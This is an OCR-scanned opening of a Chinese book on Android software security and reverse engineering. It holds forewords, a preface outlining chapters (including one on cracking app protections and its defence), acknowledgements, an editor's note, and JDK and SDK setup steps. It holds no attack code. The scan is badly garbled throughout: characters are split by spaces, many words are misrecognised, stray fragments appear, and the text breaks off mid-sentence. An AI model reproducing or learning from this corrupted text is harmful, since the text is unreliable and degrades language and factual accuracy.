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第 一 次 看 到 生 强 的 文章 是 在 看 雪 安 全 论坛 ， 他 以 “ 非 虫 "的 笔名 发 
表 了 几 篇 Android 安 全 的 文章 。 标 题 很 低调 ， 内 容 却 极为 丰富 ， 逻 辑 清 
晰 ， 实 践 性 强 ， 最 重要 的 是 很 有 “干货 ”。 后 来 得 知 他 在 写 书 ， 一 直 保 
持 关 注 , 今日 终于 要 出 版 了 。 

这 本 书 的 价值 无 疑 是 巨大 的 。 

在 此 之 前 ， 即 便 我 们 把 范围 扩大 到 全 球 ， 也 没有 哪 本 书 具 体 而 系 
统 地 专门 介绍 Android 逆 向 技术 和 安全 分 析 技 术 。 这 可 能 有 多 方面 的 原 
因 ， 但 其 中 最 重要 的 一 点 是 竞争 与 利益 。 推 动 信息 安全 技术 发 展 的 ， 
除了 爱好 者 ， 大 致 可 以 分 为 三 类 : 学 术 研 究 人 员 、 企 业 研发 人 员 、 攻 
击 者 。 

在 Android 安 全 方向 ， 研 究 人 员 相 对 更 为 开放 一 一 许多 团队 开放 了 
系统 原型 的 源码 ， 或 者 提供 了 可 用 的 工具 一 一 但 有 时 候 他 们 也 只 发 表 
论文 以 介绍 系统 设计 和 结果 ， 却 不 公开 可 以 复 用 的 资源 。 近 两 年 来 ， 
顶级 会 议 对 Android 安 全 的 研究 颇 为 青睐 ， 他 们 如 此 选择 ， 可 以 理解 。 

在 这 个 市 场 正高 速 增长 的 产业 中 ， 对 企业 而 言 ， 核 心 技术 更 是 直 
接 关 系 到 产品 的 功能 和 人 性能， 关系 到 企业 竞争 力 和 市 场 份额 ， 许 多 企 
业 会 为 了 扩大 技术 影响 而 发 布 白皮书 ， 但 真正 前 沿 的 、 独 有 的 东西 ， 
极 少 会 轻易 公开 。 

攻击 者 则 最 为 神秘 ， 为 了 躲避 风险 ， 他 们 大 都 想 尽 一 切 办 法 隐藏 
自己 的 痕迹 ， 低 调 以 求生 存 。 在 地 下 产业 链 迅 速 形成 后 ， 对 他 们 而 
言 ， 安 全 技术 更 是 非法 获 利 的 根本 保障 。 

在 这 种 情况 下 ， 刚 刚 进入 或 希望 进入 这 一 领域 的 人 会 发 现 ， 他 们 
面临 的 是 各 种 零散 而 不 成 体系 的 、 质 量 参 次 不 齐 的 、 可 能 泛泛 而 谈 


的 、 也 可 能 已 经 过 时 的 技术 资料 ， 他 们 不 得 不 去 重复 别人 走 过 的 路 、 
犯 别 人 犯 过 的 错 ， 将 精力 消耗 在 这 些 琐碎 之 中 ， 而 难以 真正 跟 上 技术 
的 发 展 。 

生 强 的 这 本 书 ， 无 疑 将 大 为 改善 这 种 局 面 ， 堪 称 破局 之 作 。 做 到 
这 一 点 顾 为 不 易 ， 这 意味 着 大 量 的 阅读 、 总 结 、 尝 试 和 创造 。 事 实 
上 ， 书 中 介绍 的 很 多 技术 和 知识 ， 我 此 前 从 未 在 别 的 地 方 看 到 过 。 

另 一 方面 ， 在 Android 这 个 平台 ， 我 们 已 经 面临 诸多 的 威胁 。 亚 意 
代码 数量 呈 指 数 增长 ， 并 且 出 现 了 多 种 对 抗 分 析 、 检 测 、 查 杀 的 技 
A; 应 用 软件 和 数字 内 容 的 版 权 不 断 遭 到 侵害 ， 软 件 破 解 、 软 件 自 
改 、 广 告 库 修 改 和 植 入 、 恶 意 代码 植 入 、 应 用 内 付费 破解 等 普遍 存 
ft; 应 用 软件 本 身 的 安全 漏洞 频繁 出 现在 国内 外 互联 网 企业 的 产品 
中 ， 数 据 泄 露 和 账户 被 盗 等 潜在 风险 让 人 担忧 ;官方 系统 、 第 三 方 定 
制 系统 和 预 装 软件 的 漏洞 不 断 被 发 现 ， 对 系统 安全 与 稳定 产生 极 大 的 
威胁 ; 移动 支付 从 概念 逐步 转 为 实践 ， 而 对 通信 技术 的 攻击 、 对 算法 
和 协议 的 攻击 时 常 发 生 ; 移动 设备 正 融入 办 公 环 境 ， 但 移动 平台 的 攻 
击 与 APT 攻 击 结 合 的 趋势 日 益 明 显 .…... 更 糟 的 是 ， 随 着 地 下 产业 链 的 
不 断 成 熟 和 扩大 ， 以 及 攻击 技术 的 不 断 发 展 和 改进 ， 这 些 威胁 和 相关 
攻击 只 会 来 势 更 凶 。 

军 无 疑问 ， 在 Android 安 全 上 我 们 面临 极 大 的 挑战 。 在 这 个 时 候 ， 
生 强 的 这 本 书 起 到 的 将 是 雪 中 送 发 的 作用 。 

安全 技术 几乎 都 是 双 刃 剑 ， 它 们 既 能 协助 我 们 开发 更 有 效 的 保护 
技术 ， 也 几乎 必定 会 被 攻击 者 学 习 和 参考 。 这 里 的 问题 是 ， 大 量 安全 
技术 的 首次 大 范围 公开 ， 是 否 会 带 来 广泛 的 模仿 和 学 习 ， 从 而 引发 更 
多 的 攻击 ? 在 这 个 问题 上 ， 安 全 界 一 直 存 在 争议 。1987 年 出 版 的 一 本 
书 中 首次 公布 了 感染 式 病 毒 的 反 汇 编 代 码 ， 引 发 大 量 模仿 的 新 病毒 出 
现 。 自 此 ， 这 个 问题 成 为 每 一 本 里 程 碑 式 的 安全 书籍 都 无 法 绕 开 的 话 
题 。 我 个 人 更 喜欢 的 则 是 这 样 一 个 观点 ， 在 《信息 安全 工程 》 中 ， 


Ross Anderson 说 : “尽管 一 些 恶意 分 子 会 从 这 样 的 书 中 获 益 ， 但 他 们 大 
都 已 经 知道 了 这 些 技巧 ， 而 好 人 们 获得 的 收益 会 多 得 多 。” 

在 生 强 写 这 本 书 的 过 程 中 ， 我 们 就 不 少 细 节 有 过 交流 和 讨论 。 他 
的 认真 给 我 留 下 了 非常 深刻 的 印象 。 与 其 他 的 安全 书籍 相 比 ， 这 本 书 
在 这 样 几 个 方面 尤为 突出 : 

实践 性 强 。 这 本 书 的 几乎 每 一 个 部 分 ， 都 结合 实际 例子 ， 一 步 步 
讲解 如 何 操作 。 因 此 ， 它 对 刚 入 门 的 人 或 者 想 快速 了 解 其 中 某 个 话题 
的 人 会 有 很 大 的 帮助 。 事 实 上 ， 缺 乏 可 操作 性 ， 是 Android 安 全 方面 现 
有 论文 、 和 白皮书 、 技 术 文 章 和 书籍 最 大 的 问题 之 一 ， 很 多 人 读 到 最 后 
可 能 对 内 容 有 了 一 些 概念 ， 却 不 知道 从 何 下 手 。 但 这 本 书 则 有 很 大 不 
同 。 

时 效 性 强 。 在 交流 中 ， 我 惊讶 地 发 现 ， 刚 刚 发 布 不 久 的 Santoku 虚 
拟 机 、APIMonitor 等 工具 ， 以 及 Androguard 的 新 特性 等 ， 已 经 出 现在 
了 这 本 书 中 。 这 意味 着 ， 生 强 在 一 边 写 作 的 同时 ， 还 一 边关 注 业 界 的 
最 新 进展 ， 并 做 了 学 习 、 尝 试 和 总 结 。 因 此 ， 这 本 书 将 具有 几乎 和 论 
文 一 样 的 时 效 性 。 

深度 和 广度 适当 。 这 本 书 涉及 的 面 很 广 ， 实 际 上 ， 仅 仅 是 目录 本 
身 ， 就 是 一 份 极 好 的 自学 参考 大 纲 。 而 其 中 最 实用 的 那些 话题 ， 例 如 
常见 C/C++ 代 码 结构 的 ARM 目 标 程序 反 汇 编 特 点 ， 没 有 源码 情况 下 对 
Android 软 件 的 调试 技术 等 ， 都 有 深入 的 介绍 。 

此 前 ， 我 曾 写 过 一 本 叫 amatutor 的 Android 恶 意 代 码 分 析 教 程 ， 并 
通过 网 络 分 享 ， 后 来 由 于 时 间 和 精力 暂停 了 更 新 。 这 段 经 历 让 我 尤其 
深刻 地 体会 到 在 这 样 一 个 新 的 领域 写 出 一 本 好 书 的 不 易 。 一 直 有 人 来 
信 希 望 我 能 继续 写 ， 但 自从 了 解 到 生 强 的 这 些 工作 ， 我 就 松 了 一 口 
气 ， 并 向 他 们 大 力 推荐 这 本 书 。 同 时 ， 我 也 向 周边 的 同事 、 同 行 推 
荐 ， 我 相信 这 本 书 的 内 容 可 以 证 明 它 的 价值 。 


肖 梓 航 (Claud) 
安 天 实验 室 高 级 研究 员 
secmobi.com 创 始 人 
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移动 平台 逐渐 成 为 人 们 上 网 的 主要 方式 。 随 着 Android 应 用 的 普 
及 ， 安 全 问题 日 益 突出 。 出 于 商业 利益 的 考虑 ，Android 系 统 的 所 有 者 
谷歌 ， 一 直 回 避 公 开 讨 论 其 安全 性 。 国 外 用 户 一 般 是 从 谷歌 应 用 商店 
下 载 应 用 ， 由 于 谷歌 自身 安全 检测 机 制 的 保障 ， 其 安全 性 不 太 可 能 
现 大 的 问题 。 但 是 ， 中 国 用 户 无 法 直接 访问 谷歌 应 用 商店 ， 大 都 是 通 
过 国内 第 三 方 Android 市 场 下 载 应 用 ， 而 谷歌 无 法 控制 第 三 方 的 应 用 商 
店 。 因 此 ， 国 内 的 Android 应 用 安全 问题 更 加 突出 ， 安 全 威胁 更 高 。 

Lookout Mobile Security 移 动 杀 毒 软件 公司 预测 : 2013 年 将 有 超过 
1800 万 台 Android 设 备 会 遭遇 某 种 形式 的 恶意 软件 的 攻击 。 国 内 安全 公 
司 的 数据 也 显示 : 流氓 推 广 、 恶 意 扣 费 、 穷 取 用 户 数据 等 恶意 软件 增 
长 迅速 ， 危 害 日 益 严 重 。 在 黑色 产业 链 中 ， 骇 客 通 过 技术 手段 将 非法 
SP 提供 的 扣 费 号 段 植 入 到 应 用 中 ， 实 现 恶 意 吸 费 。 手 机 骇 客 的 攻击 目 
标 正 在 瞄准 用 户 的 手机 支付 与 消费 行为 。 为 了 更 好 地 防范 恶意 软件 和 
骇 客 带 来 的 威胁 ， 最 好 的 办 法 是 了 解 他 们 的 攻击 方法 和 工具 ， 建 立 技 
AER, 

目前 市 场 上 研究 Android 安 全 相关 问题 的 图 书 很 少 。 因 此 当 我 拿 到 
看 雪 论 坛 Android 安 全 版 版 主 “ 非 虫 ”( 丰 生 强 ) 先生 的 倾 力 之 作 
《Android 软 件 安全 与 逆向 分 析 》 的 书稿 时 非常 高 兴 ， 并 认真 通读 了 全 
文 。 我 感到 这 是 一 本 深入 浅 出 、 可 以 快速 提升 开发 者 Android 安 全 技术 
水 平 的 好 书 ， 其 在 注重 实际 操作 讲解 的 同时 ， 还 特别 重视 一 些 原理 的 
讲解 ， 如 Dalvik 虚 拟 机 与 Java 虚 拟 机 的 比较 、APK 加 载 机 理 等 内 容 。 

据 我 所 知 ， 丰 先生 以 前 多 年 从 事 Java 相 关 软 件 的 开发 ， 并 对 
Android 系 统 的 全 部 源 代 码 进 行 过 深入 的 研究 和 分 析 ， 他 有 着 很 强 的 


Android 应 用 开发 能 力 ， 尤 其 在 安全 相关 专业 领域 经 验 丰富 。 他 能 够 在 
繁忙 的 工作 之 余 ， 耗 费 大 量 的 时 间 和 精力 为 读者 呈现 这 样 一 部 技术 专 
著 ， 并 顺利 出 版 ， 不 仅 是 读者 的 乎 运 ， 也 是 看 雪 论 坛 的 骄傲 。 在 此 ， 
我 对 他 表示 由 衷 地 祝 贯 ， 并 期 盼 他 今后 为 读者 带 来 更 多 的 撤 术 成 果 和 
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近 几 年 ，Android 在 国内 的 发 展 极其 迅猛 ， 这 除了 相关 产品 强大 的 
功能 与 丰富 的 应 用 外 ， 更 是 因为 它 优 展 的 性 能 表现 吸引 着 用 户 。2011 
年 可 谓 是 Android 的 风光 年 ， 从 手机 生产 商 到 应 用 开发 者 都 纷纷 捧场 ， 
短 短 几 个 月 的 时 间 ，Android 在 国内 红 遍 了 大 街 小 巷 ， 截 止 到 2012 年 的 
第 一 个 季度 ，Android 在 国内 的 市 场 份额 就 超过 60%， 将 曾经 风靡 一 时 
的 塞 班 系 统 远 远 的 有 在 了 身后 ， 与 此 同时 ， 它 也 带动 了 国内 移动 互联 
网 行业 的 发 展 ， 创 造 了 更 多 就 业 的 岗位 ， 国 内 人士 为 之 省 路 欢呼 。 

随 着 Android 在 国内 的 兴起 ， 基 于 Android 的 平台 应 用 需求 也 越 来 
越 复 杂 。 形 形 色 色 的 软件 壮大 了 Android 市 场 ， 也 丰富 了 我 们 的 生产 生 
活 ， 越 来 越 多 的 人 从 起 初 的 尝试 到 享受 再 到 依赖 ， 沉 浸 在 Android 的 神 
奇 海 洋 中 。 事 情 有 利 也 总 有 次， 即使 Android 如 此 优秀 也 会 有 怨声载道 
的 时 候 ， 各 种 信息 泄露 、 恶 意 扣 费 、 系 统 被 破坏 的 事件 也 屡见不鲜 ， 
Android 系 统 的 安全 也 逐渐 成 为 人 们 所 关注 的 话题 。 

如 今 市 场 上 讲解 Android 开 发 的 书籍 已 经 有 很 多 了 ， 从 应 用 软件 开 
发 层 到 系统 底层 的 研究 均 丰富 涵盖 ， 其 中 不 乏 一 些 经 典 之 作 ， 然 而 遗 
憾 的 是 ， 分 析 Android 软 件 及 系统 安全 的 书籍 却 一 本 也 没有 ， 而 且 相 关 
的 中 文 资料 也 非常 匮乏 ， 这 使 得 普通 用 户 以 及 大 多 数 Android 应 用 开发 
者 对 系统 的 安全 防护 及 软件 本 身 没 有 一 个 全 面 理性 的 认识 。 因 此 ， 笔 
者 决定 将 自身 的 实际 经 验 整理 ， 编 写 为 本 书 。 


内 容 导读 
本 书 主要 从 软件 安全 和 系统 安全 两 个 方面 讲解 Android 平 台 存 在 的 
攻击 与 防范 方法 。 


第 1 章 和 第 2 章 主要 介绍 Android 分 析 环 境 的 搭建 与 Android 程 序 的 
分 析 方 法 。 

第 3 章 详细 介绍 了 Dalvik VM 汇编 语言 ， 它 是 Android 平 台 上 进行 安 
全 分 析 工 作 的 基础 知识 ， 读 者 只 有 掌握 了 这 部 分 内 容 才 能 顺利 地 学 习 
后 面 的 章节 。 

第 4 章 介绍 了 Android 平 台 的 可 执行 文件 ， 它 是 Android 软 件 得 以 运 
行 的 基石 ， 我 们 大 多 数 的 分 析 工 作 都 是 基于 它 ， 因 此 这 部 分 内 容 必 须 
掌握 。 

第 5 章 起 正式 开始 了 对 Android 程 序 的 分 析 ， 对 这 部 分 的 理解 与 运 
用 完全 是 建立 在 前 面 章节 的 基础 之 上 。 这 一 章 详细 讲述 了 Android 软 件 
的 各 种 反 汇 编 代 码 特 征 ， 以 及 可 供 使 用 的 分 析 工 具 ， 如 何 合理 搭配 使 
用 它们 是 这 章 需 要 学 习 的 重点 。 

第 6 章 主要 讲解 ARM 汇 编 语言 的 基础 知识 ， 在 这 一 章 中 ， 会 对 
ARM 汇 编 指 令 集 做 一 个 简要 的 介绍 ， 为 下 一 章 的 学 习 做 铺垫 。 

第 7 章 是 本 书 的 一 个 高 级 部 分 ， 主 要 介绍 了 基于 ARM 架 构 的 
Android 原 生 程序 的 特点 以 及 分 析 它 们 的 方法 ， 读 者 需要 在 这 一 章 中 仔 
细 的 体会 并 实践 ， 鉴 于 此 类 程序 目前 在 市 场 上 比较 流行 ， 读 者 在 阅读 
时 需要 多 进行 实践 操作 ， 多 动手 分 析 这 类 代码 ， 加 强 自己 的 逆向 分 析 
能 力 。 

第 8 章 介绍 了 Android 平 台 上 软件 的 动态 调试 技术 ， 动 态 调试 与 静 
态 分 析 是 逆向 分 析 程 序 时 的 两 大 主要 技术 手段 ， 各 有 着 优 缺 点 ， 通 过 
动态 调试 可 以 让 你 看 到 软件 运行 到 某 一 点 时 程序 的 状态 ， 对 了 解 程序 
执行 流程 有 很 大 的 帮助 。 

第 9 章 详细 介绍 了 Android 平 台 软 件 的 破解 方法 。 主 要 分 析 了 目前 
市 场 上 一 些 常见 的 Android 程 序 保 护 方 法 ， 分 析 它 们 的 保护 效果 以 及 介 
绍 如 何 对 它们 进行 破解 ， 通 过 对 本 章 的 学 习 ， 读 者 会 对 Android 平 台 上 
的 软件 安全 有 一 种 * 悦 然 大悟 ” 的 感觉 。 


第 10 章 介绍 了 在 面 对 软件 可 能 被 破解 的 情况 下 ， 如 何 加 强 Android 
平台 软件 的 保护 ， 内 容 与 第 9 章 是 对 立 的 ， 只 有 同时 掌握 了 攻 与 防 ， 才 
能 将 软件 安全 真正 地 掌握 到 位 。 

第 11 章 从 系统 安全 的 角度 出 发 ， 分 析 了 Android 系 统 中 不 同 环节 可 
能 存在 的 安全 隐患 ， 同 时 介绍 了 面 对 这 些 安全 问题 时 ， 如 何 做 出 相应 
的 保护 措施 。 另 外 ， 本 章 的 部 分 小 节 还 从 开发 人 员 的 角度 出 发 ， 讲 解 
不 安全 代码 对 系统 造成 的 危害 ， 读 者 在 掌握 这 部 分 内 容 后 ， 编 写 代码 
的 安全 意识 会 明显 提高 。 

第 12 章 采用 病毒 实战 分 析 的 方式 ， 将 前 面 所 学 的 知识 全 面 展示 并 
加 以 应 用 ， 让 读者 能 彻底 地 掌握 分 析 Android 程 序 的 方法 。 本 章 的 内 容 
详实 、 知 识 涵盖 范围 广 ， 读 者 完全 掌握 本 章 内 容 后 ， 以 后 动手 分 析 
Android 程 序 时 ， 便 能 够 信 手 牛 来 。 

为 了 使 读者 对 文中 所 讲述 的 内 容 有 深刻 的 认识 ， 并 且 在 阅读 时 避 
免 感 到 乏味 ， 书 中 的 内 容 不 会 涉及 太 多 的 基础 理论 知识 ， 而 更 多 的 是 
采用 动手 实践 的 方式 进行 讲解 ， 所 以 在 阅读 本 书 前 假定 读者 已 经 掌握 
了 Android 程 序 开 发 所 必 备 的 基础 知识 ， 如 果 读 者 还 不 具备 这 些 基 础 知 
识 的 话 ， 请 先 打 好 基础 后 再 阅读 本 书 。 


适合 的 读者 
本 书 适合 以 下 读者 : 


e Android 应 用 开发 者 、Android 系 统 开 发 工程 师 、Android 系 统 
安全 工作 者 。 


本 书 约定 


为 了 使 书 中 讲述 的 知识 更 加 容易 理解 ， 思 路 更 加 清晰 ， 本 书 做 了 
如 下 约定 : 


e 本 书 在 讲解 部 分 内 容 时 ， 可 能 会 对 Android 系 统 与 内 核 的 源码 
加 以 引用 ， 如 文中 无 具体 说 明 系 统 版 本 ， 则 统一 为 Android 4.1 的 系 
Zi, Linux 3.4 的 内 核 。 

e 本 书 不 介绍 Android 系 统 源码 的 下 载 方 法 ， 假 定 读 者 已 经 自行 
下 载 好 了 Android 系 统 源码 。 

e 本 书 在 引用 Android 系 统 源码 时 ， 为 了 避免 代码 占用 过 多 篇 幅 

影响 主体 的 分 析 思 路 ， 在 不 影响 理解 的 情况 下 ， 对 摘抄 的 内 容 进 行 

了 适量 的 删 减 。 

e 本 书 在 列举 实例 代码 时 ， 为 了 方便 读者 阅读 与 理解 ， 对 代码 
中 的 关键 部 分 采用 加 粗 显示 。 

e 本 书 中 在 给 出 命令 的 格式 用 法 时 ， 为 了 醒目 起 见 ， 采 用 斜体 


e 对 于 部 分 操作 容易 发 生 错 误 或 理解 上 造成 歧义 的 地 方 ， 本 书 
会 在 下 面 加 上 文本 框 注解 。 如 : 
注意 


Smali 代 码 的 语法 与 格式 会 在 本 书 第 3 章 进行 详细 介绍 。 


本 书 源 代码 
下 载 地 址 : 


http:/www.ituring.com.cn/book/1131 

点 击 “ 随 书 下 载 " 即 可 看 到 本 书 产 代码 的 下 载 链 接 。 

本 书 正文 中 提 到 的 “ 随 书 的 附 图 x” 也 一 并 打包 在 源 代码 中 。 
致谢 

首先 ， 要 感谢 本 书 的 编辑 陈 冰 先生 。 在 编写 本 书 时 ， 陈 冰 先 生 对 
书 中 每 个 章节 的 细节 都 严格 把 关 ， 并 多 次 耐心 地 教导 我 写作 的 技巧 ， 


是 他 对 书稿 质量 的 严格 要 求 ， 以 及 对 工作 的 一 丝 不 向， 才 使 得 本 书 得 
以 顺序 出 版 。 

感谢 我 的 父母 ， 是 他 们 养育 了 我 ， 给 了 我 生命 ， 他 们 永远 是 我 心 
中 最 伟大 的 人 。 

瑟 作 本 身 是 一 件 很 平 苦 的 事 ， 尤 其 是 每 天 还 要 被 生活 中 的 琐事 困 
扰 。 在 这 里 ， 我 要 感谢 这 半年 多 来 对 我 无 言 支持 的 大 哥 与 大 嫂 ， 大 嫂 
可 口 的 饭菜 补充 了 我 每 天 写作 所 需 的 营养 ， 而 大 哥 更 是 帮助 我 解决 了 
很 多 烦心 的 琐事 ， 让 我 在 写作 时 无 后 顾 之 忧 。 

好 书 总 能 给 人 带 来 心灵 上 的 震撼 。 感 谢 美 女 作家 李 帝 嫣 ， 是 她 那 
扣人心弦 的 文字 感染 了 我 ， 给 了 我 创作 的 最 初 源 动 力 。 

感谢 那些 共享 Android 安 全 技术 的 组 织 与 个 人 ， 如 果 没 有 他 们 前 期 
的 奉献 ， 笔 者 现在 可 能 还 处 在 独自 探索 的 阶段 ， 不 可 能 有 机 会 与 大 家 
分 享 如 此 前 沿 的 技术 。 

雪 学 院 是 国内 最 具 权 威 性 的 软件 安全 研究 论坛 。 感 谢 看 雪 学 院 
站 长 段 钢 先生 对 本 书 内 容 上 的 肯定 与 支持 。 

最 后 ， 感 谢 那些 关注 本 书 、 为 本 书 提 过 意见 的 朋友 ， 你 们 的 支持 

是 我 写作 本 书 最 大 的 动力 。 


作者 : 丰 生 强 
2012 年 11 月 2 日 


编辑 的 话 


每 一 本 书 的 诞生 ， 都 有 让 人 记 住 的 事情 。 在 这 本 书 的 出 版 中 ， 我 
印象 深刻 的 是 三 点 : 

一 ， 作 者 丰 生 强 在 第 一 次 给 我 交 来 样稿 时 ， 其 粗糙 不 规范 的 写 书 
格式 和 读 起 来 不 是 那么 顺 溜 的 语言 表达 让 我 国 了 一 下 ， 我 耐心 的 (也 
或 许 是 有 些 耐 着 性 子 的 ? ) 在 QQ 上 边 截图 边 详细 地 告诉 了 他 有 哪些 地 
方 的 格式 被 他 忽略 了 ， 有 哪些 地 方 的 话说 得 不 够 清楚 。 

我 说 完 后 ， 他 说 他 会 认真 修改 好 后 再 次 给 我 发 来 。 但 说 实话 ， 我 
心里 没 指望 他 第 一 次 就 能 把 格式 给 改 好 ， 因 为 对 于 第 一 次 写 书 的 作者 
来 说 ， 这 种 情况 几乎 不 曾 出 现 过 。 我 做 了 继续 指导 第 3、4 次 的 心理 准 
备 。 让 我 没 想 到 的 是 ， 几 天 后 他 第 二 次 交 来 的 稿件 就 相当 靓仔 ， 让 我 
多 少 有 些 不 相信 目 己 的 眼睛 ， 格 式 规 东 美观， 语言 流畅 清楚 ， 很 难 相 
信 这 是 同一 个 人 仅 相 隔 几 天 后 的 作品 。 他 跟 我 说 他 是 一 个 字 一 个 字 地 
来 阅读 和 修改 每 句 话 的 。 

二 ， 他 是 很 少 的 按时 且 保 质保 量 完成 书稿 的 。 对 于 作者 ， 不 管 水 
平 高 低 ， 大 多 都 擅长 干 一 件 事情 一 一 拖 稿 ， 而 策划 编辑 不 得 不 被 但 干 
另 一 件 事情 一 一 催 稿 。 但 丰 生 强 以 实际 行动 打破 了 这 一 魔 驶 ， 他 努力 
工作 ， 在 合同 规定 的 期 限 内 按时 交 来 了 全 稿 。 作 为 对 作者 拖 稿 见怪 不 
怪 的 一 名 策划 编辑 来 说 ， 纵 然 不 至 于 说 是 老 泪 纵横 吧 ， 那 也 是 感触 良 
多 啊 。 

但 从 另 一 角度 说 ， 那 些 能 完全 视 合 同 交 稿 期 限 为 无 物 的 作者 也 着 
实 让 人 不 敢 小 凯 ， 这 得 有 多 强大 的 心理 素质 才能 做 到 这 一 点 呢 ， 就 这 
么 心平 气 地 跨 过 了 最 后 期 限 。 真 心 让 人 纠结 。 


三 ， 在 整个 写作 过 程 中 ， 在 谈 及 技术 时 ， 丰 生 强 所 表现 出 的 那些 
热情 、 专 注 和 乐观 。 我 一 直 信 和 奉 的 一 点 是 ， 如 果 一 个 作者 不 能 在 他 所 
钻研 的 领域 体会 到 乐趣 和 幸福 ， 那 这 样 的 作者 写 出 来 的 东西 是 不 值得 
一 读 的 。 好 的 内 容 就 像 好 的 食材 ， 而 那 份 热情 和 乐趣 则 是 豪 饪 的 手 
法 。 

现在 ， 书 已 经 打开 ， 希 望 你 会 喜欢 。 


本 书 策划 编辑 ” 陈 冰 
2013 年 1 月 15 日 


第 1 章 ” Android 程序 分 析 环 境 搭建 


在 实际 的 Android 软 件 开 发 过 程 中 ， 可 能 很 多 开发 人 员 有 过 这 样 的 经 

E: 

e 我 有 一 个 不 错 的 idea， 正 在 开发 一 款 类 似 想法 的 软件 ， 可 是 涉及 到 
的 一 些 功 能 上 的 具体 代码 细节 却 难以 下 手 ， 我 看 到 别人 的 程序 中 有 这 个 功 
能 ， 它 们 是 如 何 实现 的 呢 ? 

e 我 不 小 心安 装 了 一 个 流氓 软件 ， 软 件 运行 时 会 自动 下 载 木马 程序 、 
恶意 扣 费 、 自 改 手机 系统 ， 它 是 如 何 做 到 这 些 的 呢 ? 

e 我 按照 网 上 介绍 的 方法 来 分 析 Android 程 序 ， 可 是 根本 就 无 法 正确 
地 反 编 译 程序 ， 或 是 反 编 译 出 的 代码 语法 混乱 ， 根 本 无 法 阅读 。 

这 些 场景 都 提出 了 一 个 疑问 ， 那 就 是 如 何 分 析 一 个 Android 应 用 程序 ? 
如 何 掌握 这 些 软件 的 架构 思想 ? 分 析 别 人 的 程序 在 很 多 人 看 来 是 不 能 够 接 
受 的 行为 ， 在 他 们 眼中 这 种 行为 都 应 被 视 为 盗窃 。 其 实 任 何 技术 的 起 源 本 
身 就 是 从 学 习 开始 的 ， 用 正确 的 态度 对 待 程序 分 析 技 术 是 可 以 的 。 

如 果 说 ， 开 发 Android 程 序 是 一 种 学 问 ， 那 么 分 析 Android 程 序 更 像 是 一 
门 艺术 。 在 浩瀚 如 海 的 反 汇 编 代 码 中 分 析出 程序 的 执行 流程 与 架构 思想 是 
一 件 很 了 不 起 的 事情 ， 这 需要 分 析 人 员 有 着 扎实 的 编程 基础 与 深厚 的 思维 
分 析 能 力 。 分 析 软 件 的 过 程 犹 如 一 次 艰难 的 旅程 ， 这 条 旅程 会 有 多 长 ? 该 
怎么 走 ? 会 有 多 少 崎 凡 险 路 ”没有 人 知道 ， 但 是 先行 者 已 经 为 我 们 铺 下 了 


台阶 ， 我 们 只 需 沿 着 它 慢 慢 前 行 。 
1.1 Windows 分 析 环 境 搭 建 


搭建 Windows 分 析 平 台 的 系统 版 本 要 求 不 高 ，Windows XP 或 以 上 即 
可 。 本 书 的 windows 平 台 的 分 析 环 境 采 用 Windows XP 32 位 系统 ， 如 果 读 者 
使 用 Windows 7 或 其 他 版 本 ， 操 作 上 是 大 同 小 异 的 。 


1.1.1. Z23€JDK 


JDK 是 Android 开 发 必须 的 运行 环境 ， 在 安装 JDK 之 前 ， 首 先 到 Oracle 公 


司 E 网 上 下 R €. 


下 E 


地 


址 为 


http://www.oracle.com/technetwork/java/javase/downloads/index.html ， 打 开 下 


载 页 面 ， 目 前 最 新 版 本 为 Java SE 6 Update 33， 如 图 1-1 所 示 。 


Java SE 6 Update 33 
This release includes security enhancements and bug 
fixes. Learn more + 


图 1-1 下 载 JDK 


JDK 


JDK 6 Docs 


" Installation 


Instructions 


* ReadMe 
" ReleaseNotes 


* Oracle 


License 


* Java SE 


Products 


* Third Party 


Licenses 


* Certified 


System 
Configurations 


JRE 


JRE 6 Docs 


* |nstallation 


Instructions 


* ReadMe 
* ReleaseNotes 


* Oracle 


License 


* Java SE 


Products 


* Third Party 


Licenses 


* Certified 


System 
Configurations 


点 击 JDK 下 面 的 DOWNLOAD 按 钮 进入 下 载 页 面 ， 勾 选 “Accept License 
Agreement” 单 选 框 ， 然 后 点 击 jdk-6u33-windows-i586.exe 进 行 下 载 。 下 载 完 
成 后 双击 安装 文件 ， 启 动 JDK 安 装 界面 ， 如 图 1-2 所 示 。 


六 Java(IN) SE Development Kit 6 Update 33 — 设置 


ORACLE 


欢迎 使 用 Java(TM) SE Development Kit 6 Update 33 安装 向 导 


此 向 导 将 引导 您 完成 Java SE Development Kit 6 Update 33 的 安装 过 程 。 


图 1-2” ”JDK 安装 界面 


与 安装 其 他 Windows 软 件 一 样 ，JDK 的 安装 过 程 也 很 简单 ， 只 需要 不 停 
点 击 下 一 步 就 可 以 顺利 安装 完成 。 安 装 完成 后 手动 添加 JAVA_HOME 环 境 变 
量 , {f 为 “C:\Program FilesJavajdk1.6.0 33" , 并 将 “Ci\Program 
Files\Javayjdk1.6.0_33\bin” 添 加 到 PATH 变 量 中 。 如 图 1-3 所 示 。 


编辑 用 户 变量 


JAVA HDME 


C:\Program FilessJavaXjdk1. 6.0 33 


确定 职 消 


编辑 用 户 变 重 


path 


Program Files*MJava*jdkl.6.0 33*bin; 


确定 取消 


图 1-3 “设置 Java 环 境 变量 


完成 所 有 步骤 后 检查 一 下 Java 是 否 安装 成 功 。 单 击 * 开 始 ” 按 钮 ， 选 择 
“运行 >， 在 出 现 的 对 话 框 中 输入 CMD 命 令 打 开 CMD 窗 口 ， 在 CMD 窗 口中 输 
入 java-version， 如 果 屏 幕 上 出 现 如 图 1-4 所 示 的 提示 ， 说 明 安 装 成 功 。 


c* C:\FINDOFS\system32\cad. exe 


Microsoft Windows XP [版 本 5.1.268081 
«C» 版 权 了 有 1985-2001 Microsoft Corp. 


C:\Documents and SettingsMidministrator»java -version 

java version "1.6.8 33" 

JavacTM) SE Runtime Environment €Xbuild 1.6.80 33-b83»5 

Java HotSpot CTM> Client UM CXbuild 280.8-b803, mixed mode, sharing? 


C:\Documents and Settings dministrator>, 


图 1-4 查看 Java 是 否 正 确 安装 


1.1.2 ”安装 Android SDK 


Android SDK 是 以 zip 压 缩 包 的 形式 提供 给 开发 人 员 的 。 首 先 到 Android 
官网 下 载 最 新 版 本 的 SDK ， 下 载 地 址 为 


http://developer.android.com/sdk/index.html。 SDK 提 供 了 d 安装 文件 两 
种 方式 供 开 发 者 下 载 ， 为 了 方便 部 署 ， 本 书 采 用 下 载 安 装 文件 的 方式 直接 
安装 ， 目 前 Android SDK 的 最 新 版 本 为 rz0， 完 整 下 载 地 址 为 : 
人 

双击 下 载 后 的 安装 文件 ， SDK 安 装 到 任意 位 置 ， 本 书 安装 环 
